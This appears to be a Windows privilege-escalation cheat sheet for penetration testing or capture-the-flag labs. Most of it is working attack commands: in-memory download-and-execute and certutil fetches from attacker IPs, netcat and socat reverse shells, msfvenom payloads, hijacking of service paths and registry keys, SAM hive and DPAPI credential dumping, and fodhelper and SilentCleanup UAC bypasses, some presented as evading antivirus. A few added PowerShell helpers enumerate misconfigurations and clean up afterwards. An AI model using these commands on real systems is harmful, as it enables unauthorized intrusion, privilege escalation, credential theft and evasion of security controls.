ALL IN ONE
payloads
PowerShell Downloading Files
#Download and execute at the same time (runs in memory, nothing written to disk)
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/rev.ps1')
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.41:8000/JuicyPotato.exe','C:/Users/kohsuke/Desktop/JuicyPotato.exe')"
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.14:7898/file.exe', 'file.exe')"
powershell -c '(Invoke-RestMethod -Uri "http://10.10.14.3:8000/JuicyPotato.exe" -Method Get -OutFile "jp.exe")'
powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.14:7898/file.exe' -OutFile 'file.exe'"
#Stream copy (StreamReader cannot open a URL and ReadToEnd() would decode the binary as text, corrupting the .exe)
powershell -c "$url = 'http://10.10.10.14:7898/file.exe'; $stream = (New-Object Net.WebClient).OpenRead($url); $out = [System.IO.File]::Create('file.exe'); $stream.CopyTo($out); $out.Close(); $stream.Close()"
powershell -c "$client = New-Object Net.WebClient; $client.DownloadFile('http://10.10.10.14:7898/file.exe', 'file.exe')"
powershell -c "$url = 'http://10.10.10.14:7898/file.exe'; $request = [System.Net.HttpWebRequest]::Create($url); $response = $request.GetResponse(); $stream = $response.GetResponseStream(); $output = [System.IO.File]::Create('file.exe'); $stream.CopyTo($output); $output.Close(); $response.Close()"
Powershell references : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
Other File Transfer Methods
Downloading from a Remote Host
certutil -urlcache -f http://YOUR_IP:PORT/filename.exe renamed.exe
copy \\10.10.14.14\share\churrasco.exe c.exe
bitsadmin /transfer myDownload /priority normal http://10.10.14.3:8000/JuicyPotato.exe jp.exe
curl -O http://10.10.15.14/example.exe
wget http://10.10.15.14/example.exe
Listeners on the attacker machine
sudo smbserver.py share .
nc -nvlp 1234
python3 -m http.server
#send a file with netcat: the receiver listens first, the sender connects
nc -nlvp 1234 > received_file
nc -nv TARGET_IP 1234 < file_to_send
On the receiving end, running
nc -l -p 1234 > out.file
will begin listening on port 1234.
On the sending end, running
nc -w 3 [destination] 1234 < out.file
sends the file; -w 3 closes the connection 3 seconds after the input is exhausted, so the receiver's nc exits.
scp example.txt user@192.168.1.100:/path/to/destination/
scp user@192.168.1.100:/path/to/file.txt /path/on/local/machine/
echo c:\Users\kohsuke\Desktop\nc.exe 10.10.14.41 4455 -e cmd.exe > reverse.bat
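Whichever transfer method is used, verify the binary once it lands: text-mode channels (StreamReader, Set-Content, copy/paste) silently corrupt .exe files. The following is an added example, not code from the original page: it downloads over HTTP with a raw stream copy and compares the SHA-256 with the hash computed on the attacker side (sha256sum file.exe). The URL, output path and expected hash are placeholders.

```powershell
# Added example (not from the original page). Fetch a tool over HTTP with a raw byte
# stream and refuse to keep it unless its SHA-256 matches the hash computed on the
# attacker side. URL, path and hash below are placeholders.

function Receive-VerifiedFile {
    param(
        [Parameter(Mandatory)] [string]$Url,
        [Parameter(Mandatory)] [string]$OutFile,
        [Parameter(Mandatory)] [string]$ExpectedSha256
    )
    $client = New-Object System.Net.WebClient
    $in  = $client.OpenRead($Url)                 # raw byte stream, no text decoding
    $out = [System.IO.File]::Create($OutFile)
    try     { $in.CopyTo($out) }
    finally { $out.Dispose(); $in.Dispose(); $client.Dispose() }

    # Get-FileHash returns upper-case hex; normalise the expected value the same way
    $actual = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256.ToUpper()) {
        # do not leave a truncated or corrupted binary behind
        Remove-Item -LiteralPath $OutFile -Force
        throw "Hash mismatch for $OutFile`: got $actual, expected $ExpectedSha256"
    }
    Get-Item -LiteralPath $OutFile | Select-Object FullName, Length, @{n = 'SHA256'; e = { $actual }}
}

# Usage (placeholder values): compute the hash on the attacker with `sha256sum file.exe`
# and paste it here before running.
Receive-VerifiedFile -Url 'http://10.10.14.10:8000/file.exe' `
                     -OutFile "$env:TEMP\file.exe" `
                     -ExpectedSha256 'REPLACE_WITH_SHA256_FROM_ATTACKER_SIDE'
```

The function throws on mismatch instead of returning a flag so that a scripted chain (download, then execute) stops rather than running a corrupt or tampered binary.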
File Permission Exploit
# Is there an executable writable by everyone (or by the current user) that runs as a privileged account?
#Check if startup programs have write access
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f exe > rev.exe
# Place rev.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".
#Check if the AlwaysInstallElevated value is 1 in both keys (it must be set under HKCU and HKLM)
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f msi > setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi
# If the current user (here "User-PC\User") has SERVICE_CHANGE_CONFIG on a service, rewrite its binary path:
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
# If the BINARY_PATH_NAME contains spaces and is not enclosed in quotes, Windows tries each space-delimited prefix + ".exe" before the real binary
sc qc unquotedsvc
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
1. Place common.exe in 'C:\Program Files\Unquoted Path Service' (the name must match the text before the next space in the unquoted path, and the directory must be writable by you).
2. Open a command prompt and type: sc start unquotedsvc
# Does the current user have FullControl (or at least SetValue) over the service's registry key?
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
windows_service.c
#include <stdlib.h> // for system()
int main() {
    // runs as the service account (usually SYSTEM) when the service starts
    system("cmd.exe /k net localgroup administrators user /add");
    return 0;
}
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
# the SCM reports a timeout (error 1053) because x.exe is not a real service binary, but the command has already run
sc start regsvc
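The checks above are spread across several manual commands. The following is an added example, not code from the original page: a read-only PowerShell pass over the same four misconfigurations (AlwaysInstallElevated, unquoted service paths with a writable hijack directory, service registry keys the caller can modify, and a writable all-users Startup folder). It only prints candidates; the service names and paths it reports are whatever the host actually has.

```powershell
# Added example (not from the original page): read-only enumeration of the
# misconfigurations listed above. Prints candidates, changes nothing.

function Test-DirWritable([string]$Dir) {
    # Create and delete a zero-byte file; simpler than evaluating the DACL by hand,
    # but it does leave a short-lived file-create event behind.
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try   { [IO.File]::WriteAllBytes($probe, [byte[]]@()); Remove-Item -LiteralPath $probe -Force; $true }
    catch { $false }
}

function Test-AlwaysInstallElevated {
    # msiexec only installs as SYSTEM when the value is 1 under BOTH hives
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
        $v = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        if ($v -ne 1) { return $false }
    }
    return $true
}

function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path -or $path.StartsWith('"')) { return }
        $exe = ($path -split '(?i)\.exe')[0]            # part before .exe, ignoring arguments
        if ($exe -notmatch '\s') { return }
        # CreateProcess tries every space-delimited prefix + ".exe" before the real binary
        $words = $exe -split ' '
        $hijacks = for ($i = 1; $i -lt $words.Count; $i++) {
            $candidate = ($words[0..($i - 1)] -join ' ') + '.exe'
            if (Test-DirWritable (Split-Path -Parent $candidate)) { $candidate }
        }
        if ($hijacks) {
            [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; PathName = $path; WritableHijack = $hijacks }
        }
    }
}

function Get-ModifiableServiceKey {
    # Service keys where one of the caller's SIDs is allowed SetValue (FullControl includes it):
    # enough to rewrite ImagePath.
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # A UAC-filtered token carries BUILTIN\Administrators as deny-only, so drop it unless elevated
    $principal = [Security.Principal.WindowsPrincipal]$id
    if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        $sids = $sids | Where-Object { $_ -ne 'S-1-5-32-544' }
    }
    Get-ChildItem HKLM:\SYSTEM\CurrentControlSet\Services -ErrorAction SilentlyContinue | ForEach-Object {
        $acl = Get-Acl -Path $_.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value } catch { continue }
            if (($sids -contains $sid) -and ($ace.RegistryRights -band [Security.AccessControl.RegistryRights]::SetValue)) {
                [pscustomobject]@{ Service = $_.PSChildName; Principal = $ace.IdentityReference.Value; Rights = $ace.RegistryRights }
                break
            }
        }
    }
}

$startup = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
"AlwaysInstallElevated (both hives = 1): $(Test-AlwaysInstallElevated)"
"All-users Startup folder writable:      $(Test-DirWritable $startup)"
"`nUnquoted service paths with a writable hijack directory:"
Get-UnquotedServicePath | Format-List
"`nService registry keys the current user can modify:"
Get-ModifiableServiceKey | Format-Table -AutoSize
```

Run it from the token you actually hold: the Administrators group is deliberately ignored when the process is not elevated, otherwise every service key would show up as modifiable from a UAC-filtered admin shell.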
Metasploit Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f aspx > letmein.aspx
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Manual Windows Reverse Shell
python3 -m http.server
#serve the payload from your attacker machine and catch the shell with a plain nc listener (nc -nvlp 4567)
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4567 -f aspx > letmein.aspx
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4567 -f exe -o filename.exe
#on the target: fetch and run it
cd C:\Windows\Temp
certutil -urlcache -f http://YOUR_IP:PORT/filename.exe renamed.exe
Metasploit Windows suggester
background
use post/multi/recon/local_exploit_suggester
run SESSION=1
Windows exploit suggesters
winpeas
wesng (runs offline against systeminfo output)
Watson (for modern Windows 10)
Sherlock (for older Windows XP / 2003)
MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : 'mrxdav.sys' WebDAV
MS16-032 : Secondary Logon Handle
MS16-034 : Windows Kernel-Mode Drivers EoP
MS16-135 : Win32k Elevation of Privilege
CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc
Windows System Enumeration
systeminfo
#32-bit or 64-bit?
wmic os get osarchitecture
systeminfo | findstr /b /c:"OS Name" /c:"OS Version" /c:"System Type"
#installed hotfixes (feed these to wesng / Watson)
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic logicaldisk
wmic logicaldisk get caption,description,providername
wmic logicaldisk get caption
Windows User Enumeration
whoami
whoami /priv
whoami /groups
net user
net user jack
net localgroup
net localgroup administrators
Windows Network Enumeration
netstat -ano | findstr "LISTEN"
ipconfig
ipconfig /all
#ARP cache: hosts this machine has recently talked to on the local network
arp -a
#Check route table
route print
#Check open ports
netstat -ano
Windows Password Hunting
#find 'password' inside .txt, .ini and .config files, current directory and below (/s), case-insensitive (/i)
findstr /si password *.txt *.ini *.config
#find files whose name contains 'password' anywhere on C:
dir /s C:\* | findstr /i "password"
#show alternate data streams
dir /r
#lower-case names, include hidden and system files
dir /l /a
#Common suspicious file locations
C:\Users\Public
C:\Users\Test\AppData\Roaming
#Stored credentials (Credential Manager): usable with runas /savecred without knowing the password
cmdkey /list
runas /user:ACCESS\Administrator /savecred "cmd /c <command>"
runas /user:ACCESS\Administrator /savecred "cmd /c C:\Users\security\Desktop\nc.exe 10.10.14.17 4567 -e cmd.exe"
Credential Extracting
reg.exe save hklm\sam C:\xampp\htdocs\oscommerce-2.3.4\sam.save
reg.exe save hklm\security C:\xampp\htdocs\oscommerce-2.3.4\security.save
reg.exe save hklm\system C:\xampp\htdocs\oscommerce-2.3.4\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
cd Windows/System32/config
secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM
#DPAPI master keys and cached credentials
#Must have admin access to read other users' data
powershell -c "$client = New-Object Net.WebClient; $client.DownloadFile('http://10.10.14.17:8000/seatbelt.exe', 'sb.exe')"
sb.exe MasterKeys
sb.exe users
# cd to MasterKey file directory
cd C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001
# base64-encode the masterkey file so it can be copied over a text-only channel
certutil -encode 0792c32e-48a5-4fe3-8b43-d93d64590580 output
# print it and paste the base64 into a file on your local machine
type output
https://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
AV Enumeration
#Check whether Windows Defender is running
sc query windefend
#List running services
sc queryex type= service
#Check firewall status
netsh advfirewall firewall dump
netsh firewall show state
#Check firewall configuration
netsh firewall show config
Bypass UAC
UAC: when an admin user runs something that needs elevation, a prompt asks for confirmation (Yes/No). The bypasses below only work for a user who is already in the Administrators group but is running with a filtered (medium-integrity) token.
System Configuration
Run "msconfig" (it auto-elevates, so no prompt), then Tools -> Launch Command Prompt: the cmd.exe it spawns is elevated (high integrity admin, not SYSTEM).
Authorization Manager
Run "azman.msc"
Help -> Help Topics -> right-click in the help window -> View Source (opens an elevated Notepad)
File -> Open -> set the file type to all files, browse to C:\Windows\System32, right-click cmd.exe -> Open (cmd runs elevated)
Auto Elevate = no prompt
Conditions:
Signed by the Windows publisher
Located in a trusted directory such as System32 or Program Files
Manifest requests autoElevate
sigcheck -m <exe>: dumps the manifest, so you can see whether autoElevate is on or off
fodhelper.exe: the "Manage optional features" helper (additional languages and more). It auto-elevates and then opens the ms-settings: protocol handler, so it can be abused without touching the GUI
When the ms-settings handler is looked up under HKEY_CLASSES_ROOT, a user-specific association under HKEY_CURRENT_USER (HKCU\Software\Classes) takes priority. Only if no user-specific association exists is the system-wide one under HKEY_LOCAL_MACHINE (HKLM) used, so a key the user can write hijacks the handler and the elevated fodhelper process runs our command.
C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.
C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.
fodhelper.exe (our command now runs elevated)
#cleanup
reg delete HKCU\Software\Classes\ms-settings\ /f
Windows AV detects this variant (the registry write is flagged; the same commands are kept here for comparison, see the race-condition variant below)
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f
fodhelper.exe
==================================================================================================================
Windows AV detected v2, but it still works by racing the AV (RACE CONDITION): reg add and fodhelper.exe run back to back before the key is removed
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Users\kostas\Desktop\nc.exe 10.10.14.14 4747 -e cmd.exe"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
#these two run together
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
====================================================================================================================
PowerShell variant for when the cmd version is detected by AV: register a custom ProgID (.pwn) and point ms-settings\CurVer at it instead of writing Shell\Open\command directly
$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:10.8.17.213:4445 EXEC:cmd.exe,pipes"
New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
======================================================================================================================
The same CurVer variant translated to cmd, not detected by AV at the time of writing (the second CMD line is the nc64 equivalent; use one or the other)
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:192.168.146.141:4556 EXEC:cmd.exe,pipes"
set CMD="powershell -windowstyle hidden C:\Users\ASUS\Downloads\nc64.exe 192.168.146.141 4556 -e cmd.exe"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
fodhelper.exe
==============================================================
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.jack\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".jack" /f
fodhelper.exe
#cleanup: remove whichever ProgID you used and the CurVer redirect
reg delete "HKCU\Software\Classes\.jack\" /f
reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f
==========================================
BYPASSING ALWAYS NOTIFY
- A scheduled task that runs with highest privileges does not prompt. \Microsoft\Windows\DiskCleanup\SilentCleanup can be started by a normal user and its action begins with %windir%, which is expanded from the user-controlled HKCU\Environment, so the command placed there runs elevated.
#payload string: the trailing "&REM " comments out the rest of the task's original command line
"cmd.exe /c C:\tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes &REM "
reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:10.8.17.213:4446 EXEC:cmd.exe,pipes &REM " /f
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
#cleanup: a stale windir breaks every program started from this profile
reg delete "HKCU\Environment" /v "windir" /f
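Every variant above depends on the same preconditions: UAC is on, the prompt level is not "Always notify" (fodhelper still prompts there, hence the SilentCleanup route), the caller is in Administrators but holds a filtered token, and no leftover hijack key or windir value is still lying around from a previous attempt. The following is an added example, not code from the original page: it reads those settings and reports whether the fodhelper path is viable, and includes a cleanup for the per-user keys the variants create. The ProgID names it cleans (.pwn, .thm, .jack) are the ones used on this page.

```powershell
# Added example (not from the original page): check the preconditions of the UAC
# bypasses above and clean up what they leave behind. Read-only apart from the
# explicit cleanup function.

function Get-UacContext {
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $id  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$id

    # S-1-5-32-544 is BUILTIN\Administrators. It is still listed in the token's groups
    # when UAC has filtered it to deny-only, so this means "could elevate";
    # IsInRole is only true once the token is actually elevated.
    $inAdmins   = $id.Groups.Value -contains 'S-1-5-32-544'
    $isElevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # ConsentPromptBehaviorAdmin: 0 = elevate silently, 2 = Always notify,
    # 5 = default (prompt only for non-Windows binaries, which is what auto-elevation relies on)
    $level = $pol.ConsentPromptBehaviorAdmin

    [pscustomobject]@{
        EnableLUA             = $pol.EnableLUA
        ConsentPromptAdmin    = $level
        PromptOnSecureDesktop = $pol.PromptOnSecureDesktop
        InAdministrators      = $inAdmins
        AlreadyElevated       = $isElevated
        FodhelperViable       = ($pol.EnableLUA -eq 1) -and $inAdmins -and (-not $isElevated) -and ($level -ne 2)
        # per-user ms-settings keys override HKLM; any leftover here changes what fodhelper does
        ExistingHkcuHijack    = (Test-Path 'HKCU:\Software\Classes\ms-settings')
        StaleWindir           = (Get-ItemProperty 'HKCU:\Environment' -Name windir -ErrorAction SilentlyContinue).windir
    }
}

function Remove-MsSettingsHijack {
    # Removes the per-user keys the variants above create: the ms-settings handler /
    # CurVer redirect and the custom ProgIDs used on this page.
    param([string[]]$ProgId = @('.pwn', '.thm', '.jack'))
    $keys = @('HKCU:\Software\Classes\ms-settings') + ($ProgId | ForEach-Object { "HKCU:\Software\Classes\$_" })
    foreach ($k in $keys) {
        if (Test-Path $k) { Remove-Item -Path $k -Recurse -Force; "removed $k" }
    }
    if (Get-ItemProperty 'HKCU:\Environment' -Name windir -ErrorAction SilentlyContinue) {
        Remove-ItemProperty -Path 'HKCU:\Environment' -Name windir; 'removed HKCU\Environment\windir'
    }
}

Get-UacContext | Format-List
```

FodhelperViable is false when EnableLUA is 0 (UAC off: an admin process is already high integrity and nothing needs bypassing) and when the level is 2 (Always notify), which is exactly the case the SilentCleanup task is used for.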
Read Permissions
#only possible if the current user is already an admin (e.g. a SYSTEM shell reading a file owned by Administrator)
icacls C:\Users\Administrator\Desktop\root.txt /grant username:F
icacls C:\Windows\System32\net.exe /grant username:F
"F" for Full control, "M" for Modify, "R" for Read, "W" for Write, "X" for Execute
Finding exe files
where /R c:\windows bash.exe
where /R c:\windows wsl.exe
Login methods (impacket, with known credentials)
psexec.py administrator:'password'@MACHINE_IP
smbexec.py administrator:'password'@MACHINE_IP
wmiexec.py administrator:'password'@MACHINE_IP
References
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
https://github.com/SecWiki/windows-kernel-exploits